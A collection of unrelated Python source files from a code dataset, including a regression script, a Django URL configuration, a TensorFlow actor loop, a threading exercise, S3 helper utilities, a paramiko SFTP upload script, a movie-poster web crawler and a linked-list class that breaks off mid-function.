best_score_ridge = 0\n\t# best_deg_ridge = 0\n\t# best_ridge_alpha = 0\n\t# deg = np.arange(1, 7, 1)\n\t# alpha = np.arange(0.01, 7.0, 0.01, np.float)\n\t# for i in deg:\n\t# \tfor a in alpha:\n\t# \t\tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=i)), \n\t# \t\t\t\t\t\t('linear', linear_model.Ridge (alpha = a))])\n\t# \t\tmodel_poly.fit(X_train, y_train)\n\t# \t\tsc = model_poly.score(X_test, y_test)\n\t# \t\tif sc > best_score_ridge:\n\t# \t\t\tbest_score_ridge = sc\n\t# \t\t\tbest_deg_ridge = i\n\t# \t\t\tbest_ridge_alpha = a\n\n\t# print(\"best score for poly model ridge deg {0} alpha {1} : {2}\".format(best_deg_ridge, best_ridge_alpha, best_score_ridge))\n\n\tbest_deg_ridge = 3\n\tbest_ridge_alpha = 0.01\n\n\tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=best_deg_ridge)), \n\t\t\t\t\t\t\t('linear', linear_model.Ridge (alpha = best_ridge_alpha))])\n\tmodel_poly.fit(X_train, y_train)\n\n\tfor i in X_t_n:\n\t\tprint(model_poly.predict(i)[0][0])\n\nif __name__ == \"__main__\":\n main()","sub_path":"Poynomial Regression/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34509044","text":"\"\"\"CourseProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom . import views\nfrom django.urls import path, include\n\n\nfrom django.conf.urls import url\nfrom ckeditor_uploader import views as uploader_views \nfrom django.views.decorators.http import require_http_methods # Khử decorate staff\nfrom django.views.decorators.cache import never_cache # Load hình đã upload\n\n\n \nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('', include('homepage.urls')),\n path('', include('course.urls')),\n\t\n # Module\n path('', include('userforum.urls')),\n path('', include('usercompetition.urls')),\n path('', include('userprojectshare.urls')),\n path('', include('usergame.urls')),\n path('', include('usernews.urls')),\n \n # Ckeditor\n url(r'^ckeditor/upload/', uploader_views.upload, name='ckeditor_upload'),\n url(r'^ckeditor/browse/',never_cache(uploader_views.browse), name='ckeditor_browse'),\n\n # Admin\n\t# AdminPage\n path('', include('adminpage.urls')),\n path('adminintroduction/', include('adminintroduction.urls')),\n path('adminheader/', include('adminheader.urls')),\n path('adminfooter/', include('adminfooter.urls')),\n path('adminhome/', include('adminhome.urls')),\n path('adminsliderunbar/', include('adminsliderunbar.urls')),\n path('adminaccounttype/', include('adminaccounttype.urls')),\n path('adminaccount/', include('adminaccount.urls')),\n path('adminuserdetail/', include('adminuserdetail.urls')),\n path('adminenviromentcate/', include('adminenviromentcate.urls')),\n path('adminsubject/', include('adminsubject.urls')),\n path('adminsubjectteacher/', include('adminsubjectteacher.urls')),\n path('adminsubjectpart/', include('adminsubjectpart.urls')),\n path('adminchapter/', include('adminchapter.urls')),\n path('adminlesson/', include('adminlesson.urls')),\n path('adminitem/', include('adminitem.urls')),\n path('adminactivitytype/', include('adminactivitytype.urls')),\n path('adminactivity/', include('adminactivity.urls')),\n path('adminactivitysubmittion/', include('adminactivitysubmittion.urls')),\n path('adminforum/', include('adminforum.urls')),\n path('adminprojectshare/', include('adminprojectshare.urls')),\n path('adminnews/', include('adminnews.urls')),\n path('admincompetition/', include('admincompetition.urls')),\n path('admincompetitionsubmittion/', include('admincompetitionsubmittion.urls')),\n path('adminenrollment/', include('adminenrollment.urls')),\n path('adminsubjectlike/', include('adminsubjectlike.urls')),\n path('adminlessonreply/', include('adminlessonreply.urls')),\n path('adminactivityreply/', include('adminactivityreply.urls')),\n path('adminactivitysubmittionreply/', include('adminactivitysubmittionreply.urls')),\n path('admintracking/', include('admintracking.urls')),\n path('adminforumlike/', include('adminforumlike.urls')),\n path('adminforumreply/', include('adminforumreply.urls')),\n path('adminnewsreply/', include('adminnewsreply.urls')),\n path('adminprojectsharelike/', include('adminprojectsharelike.urls')),\n path('adminprojectsharereply/', include('adminprojectsharereply.urls')),\n path('admincompetitionsubmittionlike/', include('admincompetitionsubmittionlike.urls')),\n path('admincompetitionsubmittionreply/', include('admincompetitionsubmittionreply.urls')),\n path('adminuserrank/', include('adminuserrank.urls')),\n path('admincontact/', include('admincontact.urls')),\n path('adminfastchat/', include('adminfastchat.urls')),\n path('admingametype/', include('admingametype.urls')),\n path('admingamerate/', include('admingamerate.urls')),\n path('admingame/', include('admingame.urls')),\n]\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"CourseProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"508380097","text":"import tensorflow as tf\nimport sonnet as snt\nnest = tf.contrib.framework.nest\nimport collections\nimport sys\nimport numpy as np\n\n# Structure to be sent from actors to learner.\nActorOutput = collections.namedtuple(\n 'ActorOutput', \n [\n 'env_outputs',\n 'agent_outputs'\n ]\n)\n\ndef build_actor(agent, env, FLAGS):\n \"\"\"Builds the actor loop.\"\"\"\n # Initial values.\n initial_env_output, initial_env_state = env.initial()\n initial_action = tf.zeros(FLAGS.asset_num+1, dtype=tf.float32)\n\n dummy_agent_output = agent((\n tf.expand_dims(initial_action,0),\n nest.map_structure(\n lambda t: tf.expand_dims(t, 0),\n initial_env_output\n )\n ))\n\n initial_agent_output = nest.map_structure(\n lambda t: tf.zeros(t.shape, t.dtype),\n dummy_agent_output\n )\n\n # All state that needs to persist across training iterations. This includes\n # the last environment output and last agent output. These\n # variables should never go on the parameter servers.\n def create_state(t):\n # Creates a unique variable scope to ensure the variable name is unique.\n with tf.variable_scope(None, default_name='state'):\n return tf.get_local_variable(t.op.name, initializer=t, use_resource=True)\n\n persistent_state = nest.map_structure(\n create_state,\n (\n initial_env_state,\n initial_env_output, \n initial_agent_output\n )\n )\n\n # Run the unroll. `read_value()` is \n # needed to make sure later usage will\n # return the first values and not a new\n # snapshot of the variables.\n first_values = nest.map_structure(\n lambda v: v.read_value(), \n persistent_state\n )\n\n first_env_state, first_env_output, first_agent_output = first_values\n\n def step(input_, unused_i):\n env_state, env_output, agent_output = input_\n\n batched_env_output = nest.map_structure(\n lambda t: tf.expand_dims(t, 0),\n env_output\n )\n\n # TODO update\n agent_output = agent((\n agent_output.action, \n batched_env_output\n ))\n\n # TODO remove first element of array in tensor\n env_output, env_state = env.step(\n agent_output[0], \n env_state\n )\n\n return env_state, env_output, agent_output\n\n output = tf.scan(\n step, \n tf.range(FLAGS.unroll_length), \n first_values\n )\n\n _, env_outputs, agent_outputs = output\n\n # Update persistent state with the\n # last output from the loop.\n assign_ops = nest.map_structure(\n lambda v, t: v.assign(t[-1]),\n persistent_state, \n output\n )\n\n # The control dependency ensures that the final agent and environment states\n # and outputs are stored in `persistent_state` (to initialize next unroll).\n with tf.control_dependencies(nest.flatten(assign_ops)):\n # Remove the batch dimension from the agent output.\n first_agent_output = nest.map_structure(\n lambda t: t[0], \n first_agent_output\n )\n\n agent_outputs = nest.map_structure(\n lambda t: t[:, 0], \n agent_outputs\n )\n\n # Concatenate first output and the unroll along the time dimension.\n full_agent_outputs, full_env_outputs = nest.map_structure(\n lambda first, rest: tf.concat([[first], rest], 0),\n (first_agent_output, first_env_output),\n (\n agent_outputs, \n env_outputs\n )\n )\n\n output = ActorOutput(\n env_outputs=full_env_outputs, \n agent_outputs=full_agent_outputs\n )\n\n # No backpropagation should be done here.\n return nest.map_structure(\n tf.stop_gradient, \n output\n )\n","sub_path":"agent/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379693010","text":"import random\nimport threading\nimport time\nimport logging\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\nsemaphoreAgente = threading.Semaphore(1)\n\ncantiadPuestasAgente1 = 12\ncantiadPuestasAgente2 = 11\ncantiadPuestasAgente3 = 10\npapel = []\nfosforos = []\ntabaco = []\n\n\ndef agentePapelYFosforos():\n global papel, fosforos, cantiadPuestasAgente1 \n while cantiadPuestasAgente1 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente1-=1\n papel.append(1)\n fosforos.append(1)\n semaphoreAgente.release()\n\ndef agentePapelYTabaco():\n global papel, tabaco, cantiadPuestasAgente2\n while cantiadPuestasAgente2 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente2-=1\n papel.append(1)\n tabaco.append(1)\n semaphoreAgente.release()\n\ndef agenteFosforosYTabaco():\n global tabaco, fosforos, cantiadPuestasAgente3\n while cantiadPuestasAgente3 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente3-=1\n fosforos.append(1)\n tabaco.append(1)\n semaphoreAgente.release()\n\n \n \n\ndef fumadorConPapel():\n while True:\n global fosforos\n global tabaco\n if len(fosforos) > 0 and len(tabaco) > 0: # si hay fósforos y tabaco en la mesa\n #TOMO LOS CIGARRILLOS\n fosforos.pop()\n tabaco.pop() # tomarlos\n \n logging.info(f'Fumador con Papel: Armando y fumando cigarrillo') # armar cigarrillo y fumar: se puede simular con un sleep\n time.sleep(1)\n # llamar de nuevo a agente para que reponga en la mesa dos cosas al azar\n \n \n \n \n \n \n\ndef fumadorConFosforos():\n while True:\n global papel\n global tabaco\n if len(papel) > 0 and len(tabaco) > 0: # si hay papel y tabaco en la mesa\n #TOMO LOS CIGARRILLOS\n papel.pop() # tomarlos\n tabaco.pop() # tomarlos\n logging.info(f'Fumador con Fosforos: Armando y fumando cigarrillo') # armar cigarrillo y fumar: se puede simular con un sleep\n time.sleep(1)\n # llamar de nuevo a agente para que reponga en la mesa dos cosas al azar\n \n \n \n \n \n\ndef fumadorConTabaco():\n while True:\n global papel\n global fosforos\n if len(papel) > 0 and len(fosforos) > 0: # si hay fósforos y papel en la mesa\n #TOMO LOS CIGARRILLOS\n papel.pop() # tomarlos\n fosforos.pop() # tomarlos\n logging.info(f'Fumador con Tabaco: Armando y fumando cigarrillo') # armar cigarrillo y fumar: se puede simular con un sleep\n time.sleep(1)\n # llamar de nuevo a agente para que reponga en la mesa dos cosas al azar\n \n \n \n \n \n\n\nagente1Hilo = threading.Thread(target=agentePapelYFosforos)\nagente2Hilo = threading.Thread(target=agentePapelYTabaco)\nagente3Hilo = threading.Thread(target=agenteFosforosYTabaco)\nfumadorConPapelHilo = threading.Thread(target=fumadorConPapel)\nfumadorConFosforosHilo = threading.Thread(target=fumadorConFosforos)\nfumadorConTabacoHilo = threading.Thread(target=fumadorConTabaco)\n\nagente1Hilo.start()\nagente2Hilo.start()\nagente3Hilo.start()\nfumadorConPapelHilo.start()\nfumadorConFosforosHilo.start()\nfumadorConTabacoHilo.start()","sub_path":"fumadoresConVariantes_2.py","file_name":"fumadoresConVariantes_2.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135722253","text":"import os\n\ndef getLibs(rootdir):\n libs = []\n for subdir, dirs, files in os.walk(rootdir):\n for file in files:\n libs.append(os.path.join(subdir, file)) \n return libs\n\n\ndef file_get_contents(filename):\n with open(filename) as f:\n return f.read()\n\n\ndef writeFile(file, content):\n\tf = open(file, \"w\")\n\tf.write(content)\n\tf.close()\n\ndef updateNamespace(file):\n\tcontent = file_get_contents(file)\n\tcontent = content.replace(\"Swagger\\\\Client\", \"IMN\\\\Swagger\\\\Client\")\n\twriteFile(file,content)\n\n\ndef fixSerializerBug(currDir):\n\tfile = currDir + \"/lib/ObjectSerializer.php\"\n\tcontent = file_get_contents(file)\n\tcontent = content.replace(\"$discriminator = $class::DISCRIMINATOR;\", \"$discriminator = null;\\n if(\\defined($class.'::DISCRIMINATOR')) {\\n $discriminator = $class::DISCRIMINATOR;\\n }\")\n\tcontent = content.replace(\"foreach ($instance::swaggerTypes() as $property => $type) {\", \"if(!\\method_exists($instance, 'swaggerTypes')) {\\n return $instance;\\n }\\n foreach ($instance::swaggerTypes() as $property => $type) {\")\n\twriteFile(file,content)\n\n\n\nrootdir = os.getcwd()\nfixSerializerBug(rootdir)\nlibs = getLibs(rootdir)\nfor lib in libs:\n\tprint(lib)\n\tupdateNamespace(lib)\n\n","sub_path":"unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"118041393","text":"import importlib\nimport os\nimport sys\nstderr = sys.stderr\nsys.stderr = open(os.devnull, 'w')\nfrom keras import models\nsys.stderr = stderr\nfrom functools import lru_cache\nfrom common_utils import S3Util\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom common_utils.MLLogger import MLLogging\nfrom filelock import FileLock\nfrom threading import Lock\n\ns3Config= S3Util.S3Configuration()\nlogger=MLLogging.getLog()\n\ndef parseS3filePath(s3FilePath):\n \"\"\"\n Parse the S3 file Path and extract S3 Bucket name and S3 file location.\n s3FilePath Convention: /s3-/\n If it is not parseable it will return the as is s3FilePath as the localFilePath(assuming the string is the S3 object key) and None as the bucketName\n\n :param s3FilePath: the Complete File Path Location including S3 bucket and the file with directory location\n\n :return: Splits the string to get bucket name and s3 file location according to the convention\n \"\"\"\n bucketName=None\n localFilePath=None\n if s3FilePath.startswith(\"/s3-\"):\n localFilePath= s3FilePath[s3FilePath[1:].index(\"/\") + 2:]\n bucketName= s3FilePath[:s3FilePath[1:].index(\"/\") + 1][1:]\n elif s3FilePath.startswith(\"s3-\"):\n localFilePath = s3FilePath[s3FilePath.index(\"/\") + 1:]\n bucketName = s3FilePath[:s3FilePath.index(\"/\")]\n else:\n localFilePath=s3FilePath\n return bucketName,localFilePath\n\ndef makeDirectories(localFileLocation):\n \"\"\"\n Makes directories in the location of file prior to file creation\n [FORMAT: 'folder1/folder2/filename']\n\n :param localFileLocation: The location of file where the directories are to be created prior to file creation\n\n :return: None\n \"\"\"\n try:\n localFilePath = localFileLocation[:localFileLocation.rindex(\"/\")]\n if not os.path.exists(localFilePath):\n os.makedirs(localFilePath)\n except FileExistsError:\n logger.debug(\"Folders already Exists\")\n pass\n\ndef fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=False):\n \"\"\"\n Takes S3fullPath and downloads the file and return localFileLocation\n\n :param s3FullPath: S3 file location to download\n\n :return: localFileLocation of the downloaded file\n \"\"\"\n try:\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n localFileLocation = s3util.s3Config.s3_local_folder_path + s3filePath\n logger.info(localFileLocation)\n if os.path.isfile(localFileLocation) and s3Direct is False:\n return localFileLocation\n if bucketName is None:\n raise FileNotFoundError(\"Bucket not well defined according to format and no file was found in local file system\"+str(localFileLocation))\n makeDirectories(localFileLocation)\n with FileLock(str(localFileLocation)+\".lock\"):\n with Lock():\n if not os.path.isfile(localFileLocation) or s3Direct is True:\n logger.info(\"Downloading file from S3: Bucket: \" + str(bucketName) + \" S3 file path: \" + str(s3filePath) + \" via Local API\")\n s3util.downloadFileFromS3(s3filePath, localFileLocation, bucketName)\n return localFileLocation\n except Exception as e:\n msg = \"Exception While downloading file from S3 Utility: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n@lru_cache(maxsize=20)\ndef load_pipeline_cache(s3FullFilePath):\n \"\"\"\n\n Load the file into the memory using a LRU Caching of maxsize by deriving location and appending local S3 storage path with relative s3 file path\n\n :param s3FullFilePath: S3 file location for the model\n\n :return: Pickle Object\n \"\"\"\n try:\n bucketName, s3FilePath = parseS3filePath(s3FullFilePath)\n localFileLocation = s3Config.s3_local_folder_path + s3FilePath\n return joblib.load(localFileLocation)\n except Exception as e:\n msg = \"Exception While loading the model from a file: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef load_h5_file(s3FullFilePath):\n \"\"\"\n Load the Keras specific h5 model file from the local file system\n\n :param s3FullFilePath: S3 file location for the model\n\n :return: keras model file\n \"\"\"\n try:\n bucketName, s3FilePath = parseS3filePath(s3FullFilePath)\n localFileLocation = s3Config.s3_local_folder_path + s3FilePath\n return models.load_model(localFileLocation)\n except Exception as e:\n msg = \"Exception While loading the keras model configs from a h5 file: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef readCsvFromS3(s3FullPath,s3Direct=True,**kwargs):\n \"\"\"\n Read csv file from S3 given the S3file path\n\n :param s3FullPath: csv S3 file path\n\n :param s3Direct: if True always downloads from S3, else searches in local and returns if found\n\n :param kwargs: arguments to read_csv\n\n :return: csv file\n \"\"\"\n try:\n localFileLocation=fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=s3Direct)\n return pd.read_csv(localFileLocation,**kwargs)\n except Exception as e:\n msg = \"Exception While reading csv file from S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef saveDftoS3(df, s3FullPath,**kwargs):\n \"\"\"\n Saves csv file in S3\n\n :param df: Dataframe to save to S3\n\n :param s3FullPath: S3 path to save the csv\n\n :param kwargs: arguments to save csv\n\n :return:\n \"\"\"\n try:\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n localFileLocation = s3util.s3Config.s3_local_folder_path + s3filePath\n makeDirectories(localFileLocation)\n df.to_csv(localFileLocation,**kwargs)\n s3util.uploadFileToS3(localFileLocation, s3filePath, bucketName)\n except Exception as e:\n msg = \"Exception While saving dataframe to csv file and uploading to S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef readPickleFromS3(s3FullPath,s3Direct=True,**kwargs):\n \"\"\"\n Read pickle file from S3\n\n :param s3FullPath: S3 path to read pickle from\n\n :param s3Direct: if True always downloads from S3, else searches in local and returns if found\n\n :param kwargs: arguments to save S3\n\n :return: deserialized pickle object\n \"\"\"\n try:\n localFileLocation = fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=s3Direct)\n return joblib.load(localFileLocation,**kwargs)\n except Exception as e:\n msg = \"Exception While reading pickle file from S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef checkIfS3FileExist(s3FullPath):\n \"\"\"\n Check if S3 file exist or not\n\n :param s3FullPath: S3 file path\n\n :return: True/False\n \"\"\"\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n return s3util.ifS3FileExist(s3filePath,bucketName)\n\ndef getValFromDict(name, data):\n \"\"\"\n Get the value from the key from a given dictionary and return custom exception messages if not found\n\n :param name: key to search\n\n :param data: Dictionary to search from\n\n :return: value for the given search key\n \"\"\"\n if name in data and data[name] is not None:\n return data[name]\n elif name not in data:\n raise KeyError(str(name)+\" is not defined in the request parameter\")\n elif data[name] is None:\n raise TypeError(str(name)+\" cannot be None type\")\n\ndef loadDataFramesFromDict(fileDict):\n \"\"\"\n Load the dataframes from a given dictionary of file paths\n\n :param fileDict: {key: 'filepath'}\n\n :return:{key: file}\n \"\"\"\n try:\n dfs={}\n for key in fileDict.keys():\n dfs[key]= pd.read_csv(fileDict[key])\n return dfs\n except Exception as e:\n msg =\"Unable to load csv file(s) into dataframes: \" + str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception()\n\n\ndef loadDataFramesFromList(filePaths):\n \"\"\"\n Load Dataframes from list\n\n :param filePaths: list of file paths\n\n :return: list of files\n \"\"\"\n try:\n dfs = []\n for i in filePaths:\n df = pd.read_csv(i)\n dfs.append(df)\n return dfs\n except Exception as e:\n msg=\"Unable to load csv file(s) into dataframes: \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef moduleClassFunctionInvoke(moduleClassFunctionPath, *arguments):\n \"\"\"\n Return a function call dynamically from a string function path.\n It applies reflections to load the function from the given class and module from a string\n\n :param moduleClassFunctionPath: full path of the module-class-function\n\n :param arguments: arguments to pass to the function\n\n :return: function invocation with arguments\n \"\"\"\n try:\n extractPath=moduleClassFunctionPath.rsplit('.', 2)\n module_name,py_class_name,function_name=extractPath[0],extractPath[1],extractPath[2]\n module = importlib.import_module(module_name)\n py_class = getattr(module, py_class_name)()\n return getattr(py_class, function_name)(*arguments)\n except Exception as e:\n msg=\"Problem in invocation function: \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef moduleClassType(moduleClassFunctionPath):\n \"\"\"\n Returns the type of a function dynamically from a string function path.\n\n :param moduleClassFunctionPath: full path of the module-class-function\n\n :return: type of the invoked function\n \"\"\"\n try:\n extractPath=moduleClassFunctionPath.rsplit('.', 2)\n module_name,py_class_name,function_name=extractPath[0],extractPath[1],extractPath[2]\n module = importlib.import_module(module_name)\n py_class = getattr(module, py_class_name)()\n return type(py_class)\n except Exception as e:\n msg=\"Problem in invocation function (Class checking failed): \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)","sub_path":"common_utility/build/lib/common_utils/ServiceHelper.py","file_name":"ServiceHelper.py","file_ext":"py","file_size_in_byte":10269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"347479241","text":"#!/usr/bin/env python2\nfrom operator import attrgetter\nfrom plyj.model.modifier import BasicModifier\nfrom plyj.model.name import Name\nfrom plyj.model.source_element import Declaration, Modifier\nfrom plyj.model.type import Type, TypeParameter\nfrom plyj.utility import serialize_type_parameters, serialize_body, \\\n serialize_extends, serialize_modifiers\n\n\nclass InterfaceDeclaration(Declaration):\n name = property(attrgetter(\"_name\"))\n modifiers = property(attrgetter(\"_modifiers\"))\n extends = property(attrgetter(\"_extends\"))\n type_parameters = property(attrgetter(\"_type_parameters\"))\n body = property(attrgetter(\"_body\"))\n\n def __init__(self, name, modifiers=None, extends=None,\n type_parameters=None, body=None):\n super(InterfaceDeclaration, self).__init__()\n self._fields = ['name', 'modifiers', 'extends', 'type_parameters',\n 'body']\n\n self._name = None\n self._modifiers = None\n self._extends = None\n self._type_parameters = None\n self._body = None\n\n self.name = name\n self.modifiers = modifiers\n self.extends = extends\n self.type_parameters = type_parameters\n self.body = body\n\n @name.setter\n def name(self, name):\n self._name = Name.ensure(name, True)\n\n @modifiers.setter\n def modifiers(self, modifiers):\n self._modifiers = self._assert_list(modifiers, Modifier,\n BasicModifier.ensure_modifier)\n\n @extends.setter\n def extends(self, extends):\n # Deal with people who put a string literal as the extends parameter.\n if isinstance(extends, str):\n extends = [Type(extends)]\n extends = self._alter_tokens(\"extends\", extends)\n self._extends = self._assert_list_ensure(extends, Type)\n\n @type_parameters.setter\n def type_parameters(self, type_parameters):\n self._type_parameters = self._assert_list(type_parameters,\n TypeParameter)\n\n @body.setter\n def body(self, body):\n body = self._alter_tokens(\"body\", body)\n self._body = self._assert_list(body, Declaration)\n\n def serialize(self):\n return \"{}interface {}{} {}{}\".format(\n serialize_modifiers(self.modifiers),\n self.name.serialize(),\n serialize_type_parameters(self.type_parameters),\n serialize_extends(self.extends),\n serialize_body(self.body)\n )","sub_path":"plyj/model/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"352330642","text":"#!/usr/bin/env python\n# _*_coding:utf-8_*_\n\nimport paramiko\n\nprivate_key_path = '/root/.ssh/id_rsa'\nkey = paramiko.RSAKey.from_private_key_file(private_key_path)\n\nt = paramiko.Transport(('192.168.2.23', 22))\nt.connect(username='root', pkey=key)\n\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put('/tmp/test1.txt', '/tmp/test1.txt')\nsftp.put('/tmp/test2.txt', '/tmp/test2.txt')\n\nt.close()","sub_path":"learn/day06/paramiko_manager/ssh_ftp_upload.py","file_name":"ssh_ftp_upload.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"412742760","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\n# 운영체제에서 제공하는 기본적인 기능을 활용할 수 있는\r\n# 함수를 제공하는 모듈\r\nimport os\r\n\r\ntry :\r\n if not os.path.isdir('./download'):\r\n os.makedirs(os.path.join('./download'))\r\nexcept :\r\n print('Failed to create directory.')\r\n\r\nurl = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\r\nsession = requests.Session()\r\nhtml = session.get(url).text\r\n\r\nsoup = bs(html, 'html.parser')\r\n#print(soup)\r\n\r\nmovies = soup.find_all(name='div',\r\n attrs={'class':'tit3'},\r\n limit=10)\r\n#print(\"COUNT : \", len(movies))\r\n\r\nfor i, movie in enumerate(movies) : \r\n print(f'{i+1} : {movie.a.text}')\r\n \r\n # 링크 정보 추출을 위한 A태그 정보를 추출\r\n tag_a = movie.a\r\n # 이미지 파일의 이름을 지정하기 위한 텍스트 정보 추출\r\n movie_title = str(tag_a.text).replace(':', '_') \r\n fname_image = os.path.join('./download/', movie_title + '.jpg')\r\n print('{0} : {1}'.format(i+1, fname_image))\r\n \r\n # 영화정보 페이지의 URL 정보를 저장하는 변수\r\n movie_info_page_url = 'https://movie.naver.com' + tag_a.attrs['href']\r\n #print('{0} : {1}'.format(i+1, movie_info_page_url))\r\n\r\n # 영화정보 페이지에 접근하여, HTML 내용을 추출한 후,\r\n # BeautifulSoup 객체를 생성\r\n movie_info_html = session.get(movie_info_page_url).text\r\n movie_info_soup = bs(movie_info_html, 'html.parser')\r\n\r\n movie_poster_tag = movie_info_soup.find_all(\r\n name='div', attrs={'class':'poster'})[1]\r\n #print(len(movie_poster_tag))\r\n #print(movie_poster_tag)\r\n\r\n movie_poster_img_tag = movie_poster_tag.img\r\n img_url = movie_poster_img_tag.attrs['src'].split('?')[0]\r\n print(img_url)\r\n \r\n # 이미지 파일 다운로드\r\n content = session.get(img_url).content\r\n with open(fname_image, 'wb') as f:\r\n f.write(content)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_10/crawling/crawling_download.py","file_name":"crawling_download.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"37230542","text":"\nimport collections\n\ndef aplatir(conteneurs):\n tab = []\n for conteneur in conteneurs:\n if isinstance(conteneur, collections.Iterable):\n for cont in conteneur:\n tab.append(cont)\n else:\n tab.append(conteneur)\n return tab\n\n#print(aplatir([(1,)]))\n\n#print(aplatir(([1],)) )\n\n#print(aplatir([ (0, 6, 2),[1, ('a', 4), 5]]))\n\ndef aplatir2(conteneurs):\n return [cont for conteneur in conteneurs if isinstance(conteneur, collections.Iterable) for cont in conteneur ]\n\n#print(aplatir2([ (0, 6, 2),[1, ('a', 4), 5]]))\n#print(aplatir2([(1,)])) \n#print(aplatir( ( (1, [2, 3]), [], 'a',['b', 'c'])))\n#print(aplatir2([ (0, 6, 2),[1, ('a', 4), 5]]))\n\ndef alternat(c1, c2):\n tabzips= list(zip (c1,c2))\n return [z for tabzip in tabzips if isinstance(tabzip, collections.Iterable) for z in tabzip] \n\n#print(alternat( (1, 2), ('a', 'b')))\n#print(alternat((1, 2, 3),('a', 'b', 'c')))\n\ndef intersect(A, B):\n tab = []\n for a in A:\n ax, ay = a\n for b in B:\n bx,by = b\n if bx == ax:\n tab.append(by)\n tab.append(ay)\n \n return set(tab)\n\n \n #return set([ (ay, by) for a in A for b in B ax,ay= a bx,by=b ])\n\nprint(\n { (8, 'huit'),\n (10, 'dixA'),\n (12, 'douze')},\n { (5, 'cinq'),\n (10, 'dixB'),\n (15, 'quinze')}) \n\nprint(intersect2(\n { (8, 'huit'),\n (10, 'dixA'),\n (12, 'douze')},\n { (5, 'cinq'),\n (10, 'dixB'),\n (15, 'quinze')}) )\n\n","sub_path":"S5/S58.py","file_name":"S58.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"630879757","text":"# Node class\nclass Node:\n\n # Function to initialise the node object\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\n# Linked List class contains a Node object\nclass LinkedList:\n\n # Function to initialize head\n def __init__(self):\n self.head = None\n\n\n def push(self, new_data):\n\n # 1 & 2: Allocate the Node & Put in the data\n new_node = Node(new_data)\n\n # 3. Make next of new Node as head\n new_node.next = self.head\n\n # 4. Move the head to point to new Node\n self.head = new_node\n\n\n # This function is in LinkedList class. Inserts a\n # new node after the given prev_node. This method is\n # defined inside LinkedList class shown above */\n def insertAfter(self, prev_node, new_data):\n\n # 1. check if the given prev_node exists\n if prev_node is None:\n print(\"The given previous node must inLinkedList.\")\n return\n\n # 2. create new node & Put in the data\n new_node = Node(new_data)\n\n # 4. Make next of new Node as next of prev_node\n 